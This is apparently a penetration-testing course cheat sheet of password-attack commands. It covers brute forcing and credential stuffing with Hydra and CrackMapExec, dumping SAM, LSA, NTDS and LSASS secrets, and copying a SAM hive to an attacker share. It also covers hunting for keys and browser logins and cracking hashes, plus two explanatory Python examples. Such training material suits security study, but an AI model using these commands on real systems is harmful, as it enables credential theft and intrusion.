Password Attacks Module Cheat Sheet

This document provides a cheat sheet of commands that can be used for password attacks and password cracking. It includes commands for connecting to targets, generating password mutation wordlists, performing remote password attacks over various services, and attacking passwords locally on Windows systems.

Uploaded by rolandontheropes
PASSWORD ATTACKS CHEAT SHEET
Connecting to Target

xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!
    CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol.

evil-winrm -i <ip> -u user -p password
    Uses Evil-WinRM to establish a PowerShell session with a target.

ssh user@<ip>
    Uses SSH to connect to a target using a specified user.

smbclient -U user \\\\<ip>\\SHARENAME
    Uses smbclient to connect to an SMB share using a specified user.

python3 smbserver.py -smb2support CompData /home/<nameofuser>/Documents/
    Uses smbserver.py to create a share on a Linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.

Password Mutations

cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
    Uses cewl to generate a wordlist based on keywords present on a website (crawl depth 4, minimum word length 6, lowercased).

hashcat --force password.list -r custom.rule --stdout > mut_password.list
    Uses Hashcat to generate a rule-based word list: every rule in custom.rule is applied to every word in password.list and the candidates are written to mut_password.list instead of being used for cracking.

./username-anarchy -i /path/to/listoffirstandlastnames.txt
    Uses the username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential usernames.

curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt
    Uses the Linux-based commands curl, html2text, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords.
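The hashcat rule entry above only shows the command, not what a rule file actually does to a word. The following Python program is an added example, not part of the cheat sheet or of hashcat itself: it implements a small subset of hashcat's rule functions (`:`, `l`, `u`, `c`, `C`, `t`, `r`, `d`, `$X`, `^X`, `sXY`), applies a constructed rule file to a constructed base list the way `--stdout` would, and then checks which of the mutated candidates a typical "8 characters, 3 character classes" complexity policy would still accept. The sample words, rules and the policy thresholds are assumptions chosen for the example.

```python
# Added example (not part of the cheat sheet): a small interpreter for a subset
# of hashcat's rule syntax. It makes visible what
#   hashcat --force password.list -r custom.rule --stdout
# produces from a base list, and lets a defender check whether the mutated
# candidates would still satisfy the organisation's complexity policy.
# Only the functions handled in apply_rule are implemented; the sample words
# and rules below are constructed for the example, not the module's custom.rule.
from typing import List, Optional


def apply_rule(word: str, rule: str) -> Optional[str]:
    """Apply one rule line to a word.

    Functions are read left to right; spaces between functions are separators,
    as in hashcat rule files. Returns None if the line uses a function this
    subset does not implement, so the caller skips it rather than mis-mutating.
    """
    out = word
    i = 0
    while i < len(rule):
        f = rule[i]
        if f == " ":
            i += 1
            continue
        if f == ":":                            # no-op: emit the word unchanged
            pass
        elif f == "l":                          # lowercase all
            out = out.lower()
        elif f == "u":                          # uppercase all
            out = out.upper()
        elif f == "c":                          # capitalise first, lowercase rest
            out = out[:1].upper() + out[1:].lower()
        elif f == "C":                          # lowercase first, uppercase rest
            out = out[:1].lower() + out[1:].upper()
        elif f == "t":                          # toggle the case of every character
            out = out.swapcase()
        elif f == "r":                          # reverse
            out = out[::-1]
        elif f == "d":                          # duplicate
            out = out + out
        elif f == "$" and i + 1 < len(rule):    # $X: append character X
            i += 1
            out = out + rule[i]
        elif f == "^" and i + 1 < len(rule):    # ^X: prepend character X
            i += 1
            out = rule[i] + out
        elif f == "s" and i + 2 < len(rule):    # sXY: replace every X with Y
            out = out.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            return None
        i += 1
    return out


def mutate(words: List[str], rules: List[str]) -> List[str]:
    """Candidates for every (word, rule) pair, word-major, duplicates removed.

    hashcat --stdout does not de-duplicate; the set here only keeps the
    example output short.
    """
    seen = set()
    out = []
    for w in words:
        for rule in rules:
            rule = rule.rstrip("\r\n")
            if not rule.strip() or rule.startswith("#"):   # blank lines, comments
                continue
            cand = apply_rule(w, rule)
            if cand is not None and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def passes_complexity(pw: str, min_len: int = 8, min_classes: int = 3) -> bool:
    """A typical 'complexity' policy: minimum length and character classes used."""
    classes = sum([
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(not c.isalnum() for c in pw),
    ])
    return len(pw) >= min_len and classes >= min_classes


# Constructed sample input: two base words and a rule file in hashcat syntax.
SAMPLE_WORDS = ["password", "inlane"]
SAMPLE_RULES = [":", "c", "so0", "c so0", "sa@", "$!", "c so0 $!", "c sa@ so0 $2 $3"]


def policy_survivors(words=SAMPLE_WORDS, rules=SAMPLE_RULES) -> List[str]:
    """Mutated candidates that the length-8 / 3-class policy would still accept."""
    return [c for c in mutate(words, rules) if passes_complexity(c)]


if __name__ == "__main__":
    for cand in mutate(SAMPLE_WORDS, SAMPLE_RULES):
        print(f"{cand:<14} policy_ok={passes_complexity(cand)}")
```

The point for a defender is in `policy_survivors()`: four of the fourteen candidates built from two dictionary words satisfy a length-and-classes policy, so such a policy does not by itself defeat rule-based guessing; a deny-list of mutated dictionary words or a length-first policy is what actually removes them.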

Remote Password Attacks

crackmapexec winrm <ip> -u user.list -p password.list
    Uses CrackMapExec over WinRM to attempt to brute force the specified user names and passwords against a target.

crackmapexec smb <ip> -u "user" -p "password" --shares
    Uses CrackMapExec to enumerate SMB shares on a target using a specified set of credentials.

hydra -L user.list -P password.list <service>://<ip>
    Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.

hydra -l username -P password.list <service>://<ip>
    Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.

hydra -L user.list -p password <service>://<ip>
    Uses Hydra in conjunction with a user list and a single password to attempt to crack a password over the specified service.

hydra -C <user_pass.list> ssh://<IP>
    Uses Hydra in conjunction with a list of credentials (user:password pairs) to attempt to log in to a target over the specified service. This can be used to attempt a credential stuffing attack.

crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam
    Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network.

crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa
    Uses CrackMapExec in conjunction with admin credentials to dump LSA secrets, over the network. It is possible to get clear-text credentials this way.

crackmapexec smb <ip> -u <username> -p <password> --ntds
    Uses CrackMapExec in conjunction with admin credentials to dump hashes from the NTDS file over a network.

evil-winrm -i <ip> -u Administrator -H "<passwordhash>"
    Uses Evil-WinRM to establish a PowerShell session with a Windows target using a user and password hash. This is one type of Pass-the-Hash attack.

Windows Local Password Attacks

tasklist /svc
    A command-line-based utility in Windows used to list running processes.

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
    Uses the Windows command-line utility findstr to search for the string "password" in many different file types.

Get-Process lsass
    A PowerShell cmdlet used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line, since it reveals the process ID needed for the dump.

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full
    Uses rundll32 in Windows to create an LSASS memory dump file (672 is the LSASS process ID obtained above). This file can then be transferred to an attack box to extract credentials.

pypykatz lsa minidump /path/to/lsassdumpfile
    Uses pypykatz to parse and attempt to extract credentials and password hashes from an LSASS process memory dump file.

reg.exe save hklm\sam C:\sam.save
    Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\sam, hklm\security, hklm\system).

move sam.save \\<ip>\NameofFileShare
    Uses move in Windows to transfer a file to a specified file share over the network.

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
    Uses secretsdump.py to dump password hashes from the saved SAM database; LOCAL tells it to parse the saved hive files rather than a remote target.

vssadmin CREATE SHADOW /For=C:
    Uses the Windows command-line tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely, since the live file is locked.

cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
    Uses the Windows command-line tool copy to create a copy of NTDS.dit from a volume shadow copy of C:.

Linux Local Password Attacks

for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null | grep -Ev "lib|fonts|share|core" ;done
    Script that can be used to find .conf, .config and .cnf files on a Linux system. The glob is quoted so find receives it unexpanded, and grep -E is used so the | alternatives in the exclusion pattern are treated as a regex rather than a literal string.

for i in $(find / -name "*.cnf" 2>/dev/null | grep -Ev "doc|lib");do echo -e "\nFile: " $i; grep -E "user|password|pass" $i 2>/dev/null | grep -v "\#";done
    Script that can be used to find credentials in specified file types (grep -E for the same reason as above).

for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name "*$l" 2>/dev/null | grep -Ev "doc|lib|headers|share|man";done
    Script that can be used to find common database files.

find /home/* -type f -name "*.txt" -o ! -name "*.*"
    Uses the Linux-based find command to search for text files (and files with no extension) under user home directories.

for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name "*$l" 2>/dev/null | grep -Ev "doc|lib|headers|share";done
    Script that can be used to search for common file types used with scripts.

for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name "*$ext" 2>/dev/null | grep -Ev "lib|fonts|share|core" ;done
    Script used to look for common types of documents.

cat /etc/crontab
    Uses the Linux-based cat command to view the contents of crontab in search of credentials.

ls -la /etc/cron.*/
    Uses the Linux-based ls -la command to list all files in the cron.* directories contained in /etc.

grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
    Uses the Linux-based command grep to search the file system for the key term PRIVATE KEY to discover SSH keys (":1" keeps only matches on the first line of a file, where a key header sits).

grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
    Uses the Linux-based grep command to search for the keywords PRIVATE KEY within files contained in a user's home directory.

grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"
    Uses the Linux-based grep command to search for the keyword ssh-rsa within files contained in a user's home directory.

tail -n5 /home/*/.bash*
    Uses the Linux-based tail command to search through bash history files and output the last 5 lines of each.

python3 mimipenguin.py
    Runs mimipenguin.py using python3.

bash mimipenguin.sh
    Runs mimipenguin.sh using bash.

python2.7 lazagne.py all
    Runs lazagne.py with all modules using python2.7.

ls -l .mozilla/firefox/ | grep default
    Uses the Linux-based ls command to list the Firefox profile directories where stored credentials live, then filters for the keyword default using grep.

cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
    Uses the Linux-based cat command (with jq for formatting) to view the credentials stored by Firefox in JSON.

python3.9 firefox_decrypt.py
    Runs firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. The program runs using python3.9.

python3 lazagne.py browsers
    Runs the lazagne.py browsers module using Python 3.

Cracking Passwords

hashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt
    Uses Hashcat to crack NTLM hashes using a specified wordlist.

hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show
    Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output (--show prints entries already recovered into the potfile, so the hash must have been cracked in an earlier run without --show).

unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
    Uses unshadow to combine data from passwd.bak and shadow.bak into one single file to prepare for cracking.

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
    Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes (sha512crypt) and outputs the cracked hashes to a file called unshadowed.cracked.

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt
    Uses Hashcat in conjunction with a word list to crack the md5crypt hashes in the md5-hashes.list file.

hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked
    Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked.

ssh2john.pl SSH.private > ssh.hash
    Runs the ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.

john ssh.hash --show
    Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal (--show displays results John has already stored in its pot file).

office2john.py Protected.docx > protected-docx.hash
    Runs office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash.

john --wordlist=rockyou.txt protected-docx.hash
    Uses John in conjunction with the wordlist rockyou.txt to crack the hash in protected-docx.hash.

pdf2john.pl PDF.pdf > pdf.hash
    Runs the pdf2john.pl script to convert a PDF file to a hash to be cracked.

john --wordlist=rockyou.txt pdf.hash
    Runs John in conjunction with a wordlist to crack a PDF hash.

zip2john ZIP.zip > zip.hash
    Runs zip2john against a zip file to generate a hash, then writes that hash to a file called zip.hash.

john --wordlist=rockyou.txt zip.hash
    Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash.

bitlocker2john -i Backup.vhd > backup.hashes
    Uses the bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes.

file GZIP.gzip
    Uses the Linux-based file tool to gather file format information.

for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done
    Script that runs a for-loop trying each line of rockyou.txt as the openssl password to decrypt the archive and extract its files.
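The unshadow and `hashcat -m 1800` / `-m 500` entries above assume the reader knows what the joined file looks like and why the mode number matters. The following Python program is an added example, not part of the cheat sheet and not John the Ripper's own unshadow: it re-implements the passwd/shadow join, maps each crypt(3) prefix to the hashcat mode this page uses (plus sha256crypt and bcrypt as assumed neighbours), and separates locked or passwordless accounts from entries that carry a real hash. The passwd and shadow lines are constructed for a fictional host and the hash bodies are placeholders.

```python
# Added example (not part of the cheat sheet): a re-implementation of the join
# that `unshadow /tmp/passwd.bak /tmp/shadow.bak` performs, plus the checks a
# practitioner makes before handing the result to `hashcat -m 1800` or john:
# which entries carry a real crypt hash and which hashcat mode the prefix
# implies. The passwd/shadow lines are constructed for a fictional host and the
# hash bodies are placeholders, not real credentials.
import re
from typing import Dict, List, Optional

# Constructed sample input (assumed copies of /etc/passwd and /etc/shadow).
PASSWD_BAK = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
"""

SHADOW_BAK = """\
root:$6$saltsalt$PLACEHOLDER_SHA512CRYPT_HASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$1$abcd1234$PLACEHOLDER_MD5CRYPT_HASH:19000:0:99999:7:::
bob:!:19000:0:99999:7:::
"""

# crypt(3) prefix -> hashcat mode: the page uses -m 500 (md5crypt, $1$) and
# -m 1800 (sha512crypt, $6$); sha256crypt ($5$) and bcrypt ($2*$) are added here.
CRYPT_MODES = {"1": 500, "5": 7400, "6": 1800, "2a": 3200, "2b": 3200, "2y": 3200}


def parse_shadow(text: str) -> Dict[str, str]:
    """Map user -> password field from shadow-format text; skips blanks/comments."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    return hashes


def unshadow(passwd_text: str, shadow_text: str) -> List[str]:
    """Replace the 'x' in each passwd line with the hash from shadow (unshadow output).

    Users with no shadow entry keep their original field; malformed lines
    (fewer than 7 fields) are dropped rather than written out broken.
    """
    shadow = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue
        if fields[1] == "x" and fields[0] in shadow:
            fields[1] = shadow[fields[0]]
        merged.append(":".join(fields))
    return merged


_CRYPT_RE = re.compile(r"^\$([0-9a-z]+)\$")


def hash_mode(entry: str) -> Optional[int]:
    """hashcat -m value for an unshadowed line, or None if the password field is
    not a crypt hash this table knows ('*', '!', '!!' or empty = locked / no password)."""
    field = entry.split(":")[1] if ":" in entry else entry
    m = _CRYPT_RE.match(field)
    return CRYPT_MODES.get(m.group(1)) if m else None


def crackable(entries: List[str]) -> Dict[int, List[str]]:
    """Group the entries worth feeding to a cracker by hashcat mode, since one
    hashcat run handles one -m value."""
    groups: Dict[int, List[str]] = {}
    for e in entries:
        mode = hash_mode(e)
        if mode is not None:
            groups.setdefault(mode, []).append(e)
    return groups


if __name__ == "__main__":
    for mode, lines in crackable(unshadow(PASSWD_BAK, SHADOW_BAK)).items():
        print(f"hashcat -m {mode} candidates:")
        for entry in lines:
            print("   ", entry)
```

For the sample host the join yields two crackable entries in two different modes (root under -m 1800, alice under -m 500) and two that no cracker can work on (daemon and bob are locked). From the defensive side the same grouping is a quick audit: any `$1$` entry in a real shadow file is a legacy md5crypt hash that should be rehashed at next login, and any unknown prefix returned as None deserves a look before it is assumed safe.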
